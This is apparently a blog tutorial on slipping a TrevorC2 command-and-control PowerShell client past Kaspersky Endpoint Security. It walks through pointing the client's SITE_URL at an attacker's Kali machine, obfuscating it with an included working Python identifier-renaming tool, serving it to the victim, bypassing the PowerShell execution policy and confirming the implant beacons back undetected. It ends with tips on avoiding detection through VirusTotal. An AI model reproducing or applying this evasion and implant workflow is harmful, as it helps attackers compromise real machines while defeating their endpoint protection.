Bypass Kaspersky Endpoint Security for Windows with TrevorC2 + Pyfuscation

Joas Antonio
3 min read · Mar 4, 2021


Let’s download TrevorC2 and PyFuscation:

git clone https://github.com/trustedsec/trevorc2

git clone https://github.com/CBHue/PyFuscation

After cloning both repositories, copy trevor_client.ps1 from the trevorc2 folder into the PyFuscation folder.

Edit SITE_URL in trevor_client.ps1 so that it points to the IP address of your Kali machine, and save the file.

Let’s obfuscate the PowerShell client with PyFuscation.

If all goes well, PyFuscation finishes with output like the screenshot, which includes the path of the folder where the obfuscated copy was written.

Then open that folder and rename the generated .ps1 file to something less conspicuous.
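To see what the obfuscation step actually changes, here is a small added Python example written for this article. It is not PyFuscation’s code, and the embedded PowerShell (SAMPLE, with the made-up Get-Beacon function and a few TrevorC2-looking variable names) is a constructed stand-in, not trevor_client.ps1. The obfuscate() function does the core of what PyFuscation does: it renames every user-defined variable and function to a random identifier, consistently at the definition and at every use, while leaving PowerShell’s automatic variables, $env: drive references and single-quoted literals alone. That is why a signature written against the stock client’s identifiers stops matching while the script still runs.

```python
"""Toy PowerShell identifier renamer, added for this article (not PyFuscation's code).

Renames user-defined variables and functions consistently to random identifiers
while leaving PowerShell's automatic variables, $env:-style drive references and
single-quoted literals (which PowerShell does not interpolate) untouched.
"""
import random
import re
import string

# Automatic/preference variables PowerShell defines itself (partial list); never rename these.
RESERVED_VARS = {
    "_", "psitem", "true", "false", "null", "args", "input", "this", "host", "error",
    "pwd", "home", "pid", "profile", "matches", "lastexitcode", "psscriptroot",
    "pscommandpath", "psboundparameters", "psversiontable", "erroractionpreference",
}

# '...' is literal and must stay as-is; "..." interpolates $vars and must be rewritten.
STRING_RE = re.compile(r"'(?:[^']|'')*'|\"(?:[^\"`]|`.|\"\")*\"")
# $name, but not drive-qualified forms such as $env:NAME or $script:name.
VAR_RE = re.compile(r"\$(?![A-Za-z]+:)([A-Za-z_][A-Za-z0-9_]*)")
FUNC_DEF_RE = re.compile(r"^\s*function\s+([A-Za-z_][A-Za-z0-9_-]*)", re.IGNORECASE | re.MULTILINE)

# Constructed stand-in for a TrevorC2-style client; this is NOT trevor_client.ps1.
SAMPLE = r'''
$SITE_URL = "http://192.168.0.10"
$ROOT_PATH_QUERY = "/"
$CYCLE_DELAY = 5

function Get-Beacon($Target, $Path) {
    $uri = "$Target$Path"
    Write-Output 'literal $uri is left alone'
    return $uri
}

$beacon = Get-Beacon $SITE_URL $ROOT_PATH_QUERY
Write-Output "Polling $beacon every $CYCLE_DELAY seconds as $env:USERNAME"
'''


def split_segments(script):
    """Yield (text, kind) with kind 'code', 'dq' (double-quoted) or 'sq' (single-quoted)."""
    pos = 0
    for m in STRING_RE.finditer(script):
        if m.start() > pos:
            yield script[pos:m.start()], "code"
        yield m.group(0), "sq" if m.group(0)[0] == "'" else "dq"
        pos = m.end()
    if pos < len(script):
        yield script[pos:], "code"


class NameFactory:
    """Hands out unique random identifiers; seedable so a run is reproducible."""

    def __init__(self, seed=None, length=10):
        self.rng, self.length, self.used = random.Random(seed), length, set()

    def fresh(self):
        while True:
            name = self.rng.choice(string.ascii_letters) + "".join(
                self.rng.choices(string.ascii_letters + string.digits, k=self.length - 1))
            if name.lower() not in self.used:  # PowerShell identifiers are case-insensitive
                self.used.add(name.lower())
                return name


def obfuscate(script, seed=None):
    """Return (rewritten_script, var_map, func_map); maps are keyed on the lower-cased original."""
    names, var_map, func_map = NameFactory(seed), {}, {}
    # Pass 1: collect identifiers from code and double-quoted strings only.
    for text, kind in split_segments(script):
        if kind == "sq":
            continue
        for m in VAR_RE.finditer(text):
            key = m.group(1).lower()
            if key not in RESERVED_VARS and key not in var_map:
                var_map[key] = names.fresh()
        if kind == "code":
            for m in FUNC_DEF_RE.finditer(text):
                if m.group(1).lower() not in func_map:
                    func_map[m.group(1).lower()] = names.fresh()
    func_re = re.compile(r"\b(" + "|".join(map(re.escape, func_map)) + r")\b",
                         re.IGNORECASE) if func_map else None
    # Pass 2: rewrite definitions and every use; single-quoted literals pass through.
    out = []
    for text, kind in split_segments(script):
        if kind != "sq":
            text = VAR_RE.sub(lambda m: "$" + var_map.get(m.group(1).lower(), m.group(1)), text)
        if kind == "code" and func_re:
            text = func_re.sub(lambda m: func_map[m.group(1).lower()], text)
        out.append(text)
    return "".join(out), var_map, func_map


if __name__ == "__main__":
    rewritten, vmap, fmap = obfuscate(SAMPLE, seed=7)
    print(rewritten)
    print("variables:", vmap)
    print("functions:", fmap)
```

Run it and diff the output against SAMPLE: every $SITE_URL, $uri and Get-Beacon is gone, but $env:USERNAME and the single-quoted literal survive. The check a real run needs is the same one PyFuscation needs: named arguments (-Target) and ${braced} variables are not rewritten here, so a script that uses them would break, and the obfuscated copy must be executed in a lab before it goes anywhere near a target.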

Next, serve that folder from Kali with Python’s built-in http.server (python3 -m http.server listens on port 8000 by default) and download the .ps1 onto the victim’s machine.

Note that Kaspersky Endpoint Security is running on the victim and its protection is active.

Now open PowerShell as Administrator.

In Firefox on the victim, browse to the Kali machine’s IP address on port 8000 and download the obfuscated PowerShell script.

The script is now in the Downloads folder.

On Kali, start the TrevorC2 server: python3 trevorc2_server.py

Now run the obfuscated script on the victim.

This error means the machine’s PowerShell execution policy is Restricted (the default on Windows clients), so no script files may run.

Lift it with Set-ExecutionPolicy Unrestricted, which is why PowerShell was opened as Administrator. Keep in mind that the execution policy is a safety net against accidentally running scripts, not a security boundary: the same effect is available without admin rights via powershell.exe -ExecutionPolicy Bypass.

Run the script again. Under Unrestricted, PowerShell only warns that the script was downloaded from the internet and asks whether to run it; confirm and it executes.

Back on Kali, the agent has checked in with the TrevorC2 server: Kaspersky blocked neither the download nor the execution of the obfuscated client.

From the C2 console we can view the victim machine’s information.

So a TrevorC2 client whose identifiers were merely obfuscated with PyFuscation bypassed Kaspersky Endpoint Security for Windows with ease.

Hybrid Analysis and VirusTotal likewise report no detections for the obfuscated script (bear in mind that anything submitted to VirusTotal is shared with the AV vendors, so a payload should only be uploaded once it no longer needs to stay unseen).
Of course, I uploaded it to VirusTotal on purpose.
